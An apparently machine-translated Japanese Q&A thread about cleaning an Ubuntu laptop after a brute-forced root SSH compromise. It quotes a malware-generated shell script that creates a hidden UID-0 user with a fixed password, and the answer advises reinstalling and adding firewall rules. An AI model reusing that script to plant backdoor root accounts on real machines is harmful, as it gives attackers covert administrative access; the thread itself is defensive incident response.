ラップトップでマルウェアに対処する方法は？

Ubuntu 13.10ラップトップが何らかのマルウェアに感染していることはかなり確信しています。

時々、プロセス/ lib / sshd（rootが所有）が実行され、CPUを大量に消費しているのを見つけます。/ usr / sbin / sshdを実行するのはsshdサーバーではありません。

バイナリには--wxrw-rwt権限があり、/ libディレクトリにスクリプトを生成および生成します。最近のものは13959730401387633604という名前で、次のことを行います

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

gusrユーザーはマルウェアによって独自に作成された後、100％のCPUを消費しながらchpasswdがハングします。

これまでのところ、/ etc /のファイルにgusrユーザーが追加されたことを確認しました。

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

マルウェアは、これらすべてのファイルのコピーに「-」という接尾辞を付けたようです。ルートによって変更された/ etc /ファイルの完全なリストは、ここから入手できます。

さらに、/ etc / hostsファイルがthisに変更されました。

/ lib / sshdは、/ etc / init.d / rc.localファイルの最後に自分自身を追加することから始まります！

ユーザーを削除し、ファイルを削除し、処理済みのツリーを削除し、パスワードを変更し、ssh公開キーを削除しました。

基本的にネジ止めされていることを認識しており、システム全体を再インストールする可能性が高いです。それにもかかわらず、私は他のいくつかのマシンにログインしているので、少なくともそれを削除して、どうやってそれを手に入れたかを試してみるといいでしょう。この方法についての提案はありがたいです。

彼らは3月25日にルートログインを強引に行ったようです。Ubuntuでルートsshがデフォルトで有効になっていることは知りませんでした。私はそれを無効にし、拒否ホストを設置しました。

ログインは、明らかに香港のどこかにある59.188.247.236からでした。

EmperorLinuxからラップトップを入手し、ルートアクセスを有効にしました。これらのいずれかがあり、sshdを実行している場合は注意してください。

まず、そのマシンをネットワークから切り離します！

次に、なぜルートアカウントを有効にしたのですか？本当に正当な理由がない限り、rootアカウントを有効にすべきではありません。

第三に、はい、クリーンであることを確認する唯一の方法は、クリーンインストールを実行することです。また、すべてを開始したのがいつかわからないので、新たに開始してバックアップに戻らないことをお勧めします。

また、次のインストールでファイアウォールを設定し、すべての着信接続を拒否することをお勧めします。

sudo ufw default deny incoming

sshを許可します：

sudo ufw allow ssh

そして、rootアカウントを有効にしないでください！確かに、ルートSSHログインが無効になっていることを確認してください。